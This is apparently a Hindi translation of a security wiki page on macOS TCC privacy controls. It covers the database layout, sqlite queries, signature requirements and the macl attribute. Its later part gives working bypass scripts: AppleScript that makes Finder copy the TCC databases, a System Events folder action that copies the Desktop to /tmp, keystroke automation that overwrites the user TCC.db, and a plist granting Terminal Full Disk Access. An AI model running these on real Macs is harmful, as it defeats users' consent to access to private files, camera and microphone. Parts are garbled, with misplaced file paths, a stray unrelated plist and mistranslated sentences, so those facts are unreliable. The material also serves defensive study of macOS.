मूल जानकारी

TCC (पारदर्शिता, सहमति और नियंत्रण) एक सुरक्षा प्रोटोकॉल है जो एप्लिकेशन अनुमतियों को नियंत्रित करने पर ध्यान केंद्रित करता है। इसकी प्राथमिक भूमिका है स्थान सेवाएं, संपर्क, फोटो, माइक्रोफोन, कैमरा, पहुंचनीयता और पूर्ण डिस्क एक्सेस जैसी संवेदनशील विशेषताओं की रक्षा करना। TCC उपयोगकर्ता से स्पष्ट सहमति मांगने की अनिवार्यता को बढ़ाकर इन तत्वों तक के एप्लिकेशन द्वारा पहुंच को सुरक्षित करता है और उपयोगकर्ता को उनके डेटा पर नियंत्रण प्रदान करता है।

उपयोगकर्ताओं को TCC का सामना तब होता है जब एप्लिकेशन संरक्षित विशेषताओं तक पहुंच के लिए अनुरोध करते हैं। यह एक प्रॉम्प्ट के माध्यम से दिखाई देता है जो उपयोगकर्ताओं को पहुंच को स्वीकृत या अस्वीकृत करने की अनुमति देता है। इसके अतिरिक्त, TCC निर्देशित उपयोगकर्ता क्रियाएँ भी समेत है, जैसे कि फ़ाइलों को एक एप्लिकेशन में खींचना और छोड़ना, विशिष्ट फ़ाइलों तक पहुंच प्रदान करने के लिए, यह सुनिश्चित करता है कि एप्लिकेशन केवल उसे जो स्पष्ट रूप से परमिट किया गया है तक पहुंच है।

TCC को डेमन द्वारा हैंडल किया जाता है जो /System/Library/PrivateFrameworks/TCC.framework/Support/tccd में स्थित है और /System/Library/LaunchDaemons/com.apple.tccd.system.plist में विन्यासित किया गया है (mach सेवा com.apple.tccd.system को पंजीकृत करना).

/System/Library/LaunchAgents/com.apple.tccd.plist में परिभाषित प्रति लॉग इन उपयोगकर्ता के लिए उपयोगकर्ता-मोड tccd चल रहा है जो mach सेवाएँ com.apple.tccd और com.apple.usernotifications.delegate.com.apple.tccd को पंजीकृत कर रहा है।

यहाँ आप सिस्टम और उपयोगकर्ता के रूप में tccd को देख सकते हैं:

ps -ef | grep tcc
0   374     1   0 Thu07PM ??         2:01.66 /System/Library/PrivateFrameworks/TCC.framework/Support/tccd system
501 63079     1   0  6:59PM ??         0:01.95 /System/Library/PrivateFrameworks/TCC.framework/Support/tccd

अनुमतियाँ मूल एप्लिकेशन से विरासत में मिलती हैं और अनुमतियाँ बंडल आईडी और डेवलपर आईडी के आधार पर ट्रैक की जाती हैं।

TCC डेटाबेस

अनुमतियाँ/इनकार फिर कुछ TCC डेटाबेस में संग्रहित होती हैं:

• /Library/Application Support/com.apple.TCC/TCC.db में सिस्टम-व्यापी डेटाबेस।

• यह डेटाबेस SIP सुरक्षित है, इसलिए केवल SIP बाईपास इसमें लिख सकता है।

• प्रति-उपयोगकर्ता पसंदों के लिए उपयोगकर्ता TCC डेटाबेस $HOME/Library/Application Support/com.apple.TCC/TCC.db।

• यह डेटाबेस सुरक्षित है, इसलिए केवल पूर्ण डिस्क एक्सेस जैसे उच्च TCC विशेषाधिकारों वाले प्रक्रियाएँ इसमें लिख सकती हैं (लेकिन यह SIP द्वारा संरक्षित नहीं है)।

• तीसरा TCC डेटाबेस /var/db/locationd/clients.plist में है जो स्थान सेवाओं तक पहुंचने की अनुमति देने वाले ग्राहकों को दर्शाता है।

• SIP सुरक्षित फ़ाइल /Users/carlospolop/Downloads/REG.db (जिसे TCC के साथ पढ़ने की भी सुरक्षा है) में सभी मान्य TCC डेटाबेसों का स्थान है।

• SIP सुरक्षित फ़ाइल /Users/carlospolop/Downloads/MDMOverrides.plist (जिसे TCC के साथ पढ़ने की भी सुरक्षा है) में अधिक TCC अनुमतियाँ हैं।

• SIP सुरक्षित फ़ाइल /Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist (किसी भी व्यक्ति द्वारा पढ़ने योग्य) एक ऐसी सूची है जिसमें ऐप्लिकेशनों की अनुमति की आवश्यकता है जो एक TCC अपवाद की आवश्यकता है।

codesign -dv --entitlements :- /System/Library/PrivateFrameworks/TCC.framework/Support/tccd
[..]
com.apple.private.tcc.manager
com.apple.rootless.storage.TCC

डेटाबेस का पूछताछ करें

sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db
sqlite> .schema
# Tables: admin, policies, active_policy, access, access_overrides, expired, active_policy_id
# The table access contains the permissions per services
sqlite> select service, client, auth_value, auth_reason from access;
kTCCServiceLiverpool|com.apple.syncdefaultsd|2|4
kTCCServiceSystemPolicyDownloadsFolder|com.tinyspeck.slackmacgap|2|2
kTCCServiceMicrophone|us.zoom.xos|2|2
[...]

# Check user approved permissions for telegram
sqlite> select * from access where client LIKE "%telegram%" and auth_value=2;
# Check user denied permissions for telegram
sqlite> select * from access where client LIKE "%telegram%" and auth_value=0;

sqlite3 /Library/Application\ Support/com.apple.TCC/TCC.db
sqlite> .schema
# Tables: admin, policies, active_policy, access, access_overrides, expired, active_policy_id
# The table access contains the permissions per services
sqlite> select service, client, auth_value, auth_reason from access;
kTCCServiceLiverpool|com.apple.syncdefaultsd|2|4
kTCCServiceSystemPolicyDownloadsFolder|com.tinyspeck.slackmacgap|2|2
kTCCServiceMicrophone|us.zoom.xos|2|2
[...]

# Get all FDA
sqlite> select service, client, auth_value, auth_reason from access where service = "kTCCServiceSystemPolicyAllFiles" and auth_value=2;

# Check user approved permissions for telegram
sqlite> select * from access where client LIKE "%telegram%" and auth_value=2;
# Check user denied permissions for telegram
sqlite> select * from access where client LIKE "%telegram%" and auth_value=0;

• सेवा TCC अनुमति स्ट्रिंग प्रतिनिधित्व है

• ग्राहक बंडल आईडी या बाइनरी के पथ के साथ अनुमतियों

• ग्राहक प्रकार यह दर्शाता है कि यह एक बंडल पहचानकर्ता(0) है या एक पूर्ण पथ(1)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<!-- Label for the job -->
<key>Label</key>
<string>com.example.yourbinary</string>

<!-- The path to the executable -->
<key>Program</key>
<string>/path/to/binary</string>

<!-- Arguments to pass to the executable (if any) -->
<key>ProgramArguments</key>
<array>
<string>arg1</string>
<string>arg2</string>
</array>

<!-- Run at load -->
<key>RunAtLoad</key>
<true/>

<!-- Keep the job alive, restart if necessary -->
<key>KeepAlive</key>
<true/>

<!-- Standard output and error paths (optional) -->
<key>StandardOutPath</key>
<string>/tmp/YourBinary.stdout</string>
<key>StandardErrorPath</key>
<string>/tmp/YourBinary.stderr</string>
</dict>
</plist>

• auth_value कई अलग-अलग मान रख सकता है: denied(0), unknown(1), allowed(2), या limited(3)।

• auth_reason निम्नलिखित मान ले सकता है: Error(1), User Consent(2), User Set(3), System Set(4), Service Policy(5), MDM Policy(6), Override Policy(7), Missing usage string(8), Prompt Timeout(9), Preflight Unknown(10), Entitled(11), App Type Policy(12)।

• csreq फ़ील्ड यह दर्शाता है कि कैसे बाइनरी को सत्यापित करें और TCC अनुमतियाँ प्रदान करें:

# Query to get cserq in printable hex
select service, client, hex(csreq) from access where auth_value=2;

# To decode it (https://stackoverflow.com/questions/52706542/how-to-get-csreq-of-macos-application-on-command-line):
BLOB="FADE0C000000003000000001000000060000000200000012636F6D2E6170706C652E5465726D696E616C000000000003"
echo "$BLOB" | xxd -r -p > terminal-csreq.bin
csreq -r- -t < terminal-csreq.bin

# To create a new one (https://stackoverflow.com/questions/52706542/how-to-get-csreq-of-macos-application-on-command-line):
REQ_STR=$(codesign -d -r- /Applications/Utilities/Terminal.app/ 2>&1 | awk -F ' => ' '/designated/{print $2}')
echo "$REQ_STR" | csreq -r- -b /tmp/csreq.bin
REQ_HEX=$(xxd -p /tmp/csreq.bin  | tr -d '\n')
echo "X'$REQ_HEX'"

• तालिका के अन्य क्षेत्रों के बारे में अधिक जानकारी के लिए इस ब्लॉग पोस्ट की जाँच करें।

आप पहले से दी गई अनुमतियों की जाँच भी कर सकते हैं सिस्टम प्राथमिकताएँ --> सुरक्षा और गोपनीयता --> गोपनीयता --> फ़ाइल और फ़ोल्डर्स में।

TCC अनुमतियों को रीसेट करें

# You can reset all the permissions given to an application with
tccutil reset All app.some.id

# Reset the permissions granted to all apps
tccutil reset All

TCC हस्ताक्षर जांच

TCC डेटाबेस में एप्लिकेशन का बंडल आईडी स्टोर करता है, लेकिन यह भी हस्ताक्षर के बारे में जानकारी स्टोर करता है ताकि यह सुनिश्चित कर सके कि अनुमति का उपयोग करने के लिए अप्लिकेशन सही है।

# From sqlite
sqlite> select service, client, hex(csreq) from access where auth_value=2;
#Get csreq

# From bash
echo FADE0C00000000CC000000010000000600000007000000060000000F0000000E000000000000000A2A864886F763640601090000000000000000000600000006000000060000000F0000000E000000010000000A2A864886F763640602060000000000000000000E000000000000000A2A864886F7636406010D0000000000000000000B000000000000000A7375626A6563742E4F550000000000010000000A364E33385657533542580000000000020000001572752E6B656570636F6465722E54656C656772616D000000 | xxd -r -p - > /tmp/telegram_csreq.bin
## Get signature checks
csreq -t -r /tmp/telegram_csreq.bin
(anchor apple generic and certificate leaf[field.1.2.840.113635.100.6.1.9] /* exists */ or anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = "6N38VWS5BX") and identifier "ru.keepcoder.Telegram"

अधिकार और TCC अनुमतियाँ

ऐप्स को केवल कुछ संसाधनों तक पहुंचने के लिए न केवल अनुरोध करने की आवश्यकता है, बल्कि उन्हें संबंधित अधिकार भी होने चाहिए। उदाहरण के लिए Telegram के पास com.apple.security.device.camera अधिकार है कैमरे तक पहुंचने के लिए। एक एप्लिकेशन जिसके पास यह अधिकार नहीं है, वह कैमरे तक पहुंचने में सक्षम नहीं होगा (और उपयोगकर्ता से अनुमतियाँ मांगी भी नहीं जाएंगी)।

हालांकि, ऐप्स को ~/Desktop, ~/Downloads और ~/Documents जैसे कुछ उपयोगकर्ता फोल्डर्स तक पहुंचने के लिए किसी विशेष अधिकार की आवश्यकता नहीं है। सिस्टम स्वचालित रूप से पहुंच का संचालन करेगा और उपयोगकर्ता को जरूरत के अनुसार पूछेगा।

एप्पल की ऐप्स प्रॉम्प्ट नहीं उत्पन्न करेंगी। उनमें उनकी अधिकार सूची में पूर्व-मंजूर अधिकार होते हैं, जिसका मतलब है कि वे कभी भी एक पॉपअप उत्पन्न नहीं करेंगे, न तो वे किसी भी TCC डेटाबेस में दिखाई देंगे। उदाहरण के लिए:

codesign -dv --entitlements :- /System/Applications/Calendar.app
[...]
<key>com.apple.private.tcc.allow</key>
<array>
<string>kTCCServiceReminders</string>
<string>kTCCServiceCalendar</string>
<string>kTCCServiceAddressBook</string>
</array>

यह कैलेंडर से उपयोगकर्ता से अनुरोध करेगा कि यह अनुसरण, कैलेंडर और पता-पुस्तिका तक पहुंचने की अनुमति न दें।

कुछ TCC अनुमतियाँ हैं: kTCCServiceAppleEvents, kTCCServiceCalendar, kTCCServicePhotos... इनमें से सभी को परिभाषित करने वाली कोई सार्वजनिक सूची नहीं है, लेकिन आप इस ज्ञात सेवाओं की सूची की जांच कर सकते हैं।

संवेदनशील सुरक्षित स्थान

• $HOME (इसके अंदर)

• $HOME/.ssh, $HOME/.aws, आदि

• /tmp

उपयोगकर्ता इरादा / com.apple.macl

पहले ही उल्लिखित की गई तरह, एक ऐप को एक फ़ाइल तक पहुंचने की अनुमति उसे उसमें drag&drop करके देना संभव है। यह पहुंच तो किसी TCC डेटाबेस में निर्दिष्ट नहीं की जाएगी लेकिन इसे एक फ़ाइल के विस्तारित गुणात्मक गुण के रूप में संग्रहित किया जाएगा। इस गुणात्मक गुण में अनुमति प्रदान करने वाले ऐप का UUID संग्रहित होगा:

xattr Desktop/private.txt
com.apple.macl

# Check extra access to the file
## Script from https://gist.githubusercontent.com/brunerd/8bbf9ba66b2a7787e1a6658816f3ad3b/raw/34cabe2751fb487dc7c3de544d1eb4be04701ac5/maclTrack.command
macl_read Desktop/private.txt
Filename,Header,App UUID
"Desktop/private.txt",0300,769FD8F1-90E0-3206-808C-A8947BEBD6C3

# Get the UUID of the app
otool -l /System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal| grep uuid
uuid 769FD8F1-90E0-3206-808C-A8947BEBD6C3

विस्तारित विशेषता com.apple.macl अन्य विस्तारित विशेषताओं की तरह हटाया नहीं जा सकता क्योंकि यह SIP द्वारा संरक्षित है। हालांकि, जैसा कि इस पोस्ट में स्पष्ट किया गया है, इसे अक्षम करना संभव है फ़ाइल को ज़िप करके, इसे हटाकर और इसे अनज़िप करके।

TCC Privesc & Bypasses

TCC में डालें

यदि किसी समय आपको TCC डेटाबेस पर लेखन अधिकार मिल जाते हैं, तो आप निम्नलिखित तरह का कुछ उपयोग कर सकते हैं एक प्रविष्टि जोड़ने के लिए (टिप्पणियाँ हटा दें):

TCC पेयलोड

यदि आपने किसी ऐप में TCC अनुमतियों के साथ अंदर जाने में कामयाबी प्राप्त की है, तो निम्नलिखित पृष्ठ की जाँच करें TCC पेयलोड को दुरुपयोग करने के लिए:

Apple घटनाएं

Apple घटनाओं के बारे में जानें:

स्वचालन (फाइंडर) से FDA*

स्वचालन अनुमति का TCC नाम है: kTCCServiceAppleEvents यह विशेष TCC अनुमति भी इसका संकेत देती है ऐप्लिकेशन जिसे TCC डेटाबेस के अंदर प्रबंधित किया जा सकता है (तो अनुमतियाँ सब कुछ केवल प्रबंधित करने की अनुमति नहीं देती है)।

फाइंडर एक ऐप्लिकेशन है जिसमें हमेशा FDA होता है (यदि यह UI में नहीं दिखाई देता है तो भी), इसलिए यदि आपके पास इस पर स्वचालन अनुमतियाँ हैं, तो आप इसकी अधिकारिता का दुरुपयोग करके इसे कुछ क्रियाएँ करने के लिए मजबूर कर सकते हैं। इस मामले में आपके ऐप को kTCCServiceAppleEvents अनुमति की आवश्यकता होगी com.apple.Finder पर।

# This AppleScript will copy the system TCC database into /tmp
osascript<<EOD
tell application "Finder"
set homeFolder to path to home folder as string
set sourceFile to (homeFolder & "Library:Application Support:com.apple.TCC:TCC.db") as alias
set targetFolder to POSIX file "/tmp" as alias
duplicate file sourceFile to targetFolder with replacing
end tell
EOD

osascript<<EOD
tell application "Finder"
set sourceFile to POSIX file "/Library/Application Support/com.apple.TCC/TCC.db" as alias
set targetFolder to POSIX file "/tmp" as alias
duplicate file sourceFile to targetFolder with replacing
end tell
EOD

आप इसका दुरुपयोग कर सकते हैं अपना खुद का उपयोगकर्ता TCC डेटाबेस लिखने के लिए।

यह फाइंडर पर ऑटोमेशन विशेषाधिकार प्राप्त करने के लिए TCC प्रॉम्प्ट है:

</details>

**स्क्रिप्ट संपादक ऐप** के साथ भी यही होता है, यह Finder को नियंत्रित कर सकता है, लेकिन एक AppleScript का उपयोग करके आप इसे स्क्रिप्ट को क्रियान्वित करने के लिए मजबूर नहीं कर सकते।

### ऑटोमेशन (SE) से कुछ TCC को

**सिस्टम इवेंट्स** फ़ोल्डर एक्शन बना सकते हैं, और फ़ोल्डर एक्शन कुछ TCC फ़ोल्डर तक पहुँच सकते हैं (डेस्कटॉप, दस्तावेज़ और डाउनलोड), इसलिए निम्नलिखित एक स्क्रिप्ट का उपयोग इस व्यवहार का दुरुपयोग करने के लिए किया जा सकता है:
```bash
# Create script to execute with the action
cat > "/tmp/script.js" <<EOD
var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("cp -r $HOME/Desktop /tmp/desktop");
EOD

osacompile -l JavaScript -o "$HOME/Library/Scripts/Folder Action Scripts/script.scpt" "/tmp/script.js"

# Create folder action with System Events in "$HOME/Desktop"
osascript <<EOD
tell application "System Events"
-- Ensure Folder Actions are enabled
set folder actions enabled to true

-- Define the path to the folder and the script
set homeFolder to path to home folder as text
set folderPath to homeFolder & "Desktop"
set scriptPath to homeFolder & "Library:Scripts:Folder Action Scripts:script.scpt"

-- Create or get the Folder Action for the Desktop
if not (exists folder action folderPath) then
make new folder action at end of folder actions with properties {name:folderPath, path:folderPath}
end if
set myFolderAction to folder action folderPath

-- Attach the script to the Folder Action
if not (exists script scriptPath of myFolderAction) then
make new script at end of scripts of myFolderAction with properties {name:scriptPath, path:scriptPath}
end if

-- Enable the Folder Action and the script
enable myFolderAction
end tell
EOD

# File operations in the folder should trigger the Folder Action
touch "$HOME/Desktop/file"
rm "$HOME/Desktop/file"

-- store the TCC.db file to copy in /tmp
osascript <<EOF
tell application "System Events"
-- Open Finder
tell application "Finder" to activate

-- Open the /tmp directory
keystroke "g" using {command down, shift down}
delay 1
keystroke "/tmp"
delay 1
keystroke return
delay 1

-- Select and copy the file
keystroke "TCC.db"
delay 1
keystroke "c" using {command down}
delay 1

-- Resolve $HOME environment variable
set homePath to system attribute "HOME"

-- Navigate to the Desktop directory under $HOME
keystroke "g" using {command down, shift down}
delay 1
keystroke homePath & "/Library/Application Support/com.apple.TCC"
delay 1
keystroke return
delay 1

-- Check if the file exists in the destination and delete if it does (need to send keystorke code: https://macbiblioblog.blogspot.com/2014/12/key-codes-for-function-and-special-keys.html)
keystroke "TCC.db"
delay 1
keystroke return
delay 1
key code 51 using {command down}
delay 1

-- Paste the file
keystroke "v" using {command down}
end tell
EOF

# Get needed info
codesign -d -r- /System/Applications/Utilities/Terminal.app

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Services</key>
<dict>
<key>SystemPolicyAllFiles</key>
<array>
<dict>
<key>CodeRequirement</key>
<string>identifier &quot;com.apple.Terminal&quot; and anchor apple</string>
<key>IdentifierType</key>
<string>bundleID</string>
<key>Identifier</key>
<string>com.apple.Terminal</string>
</dict>
</array>
</dict>
</dict>
</plist>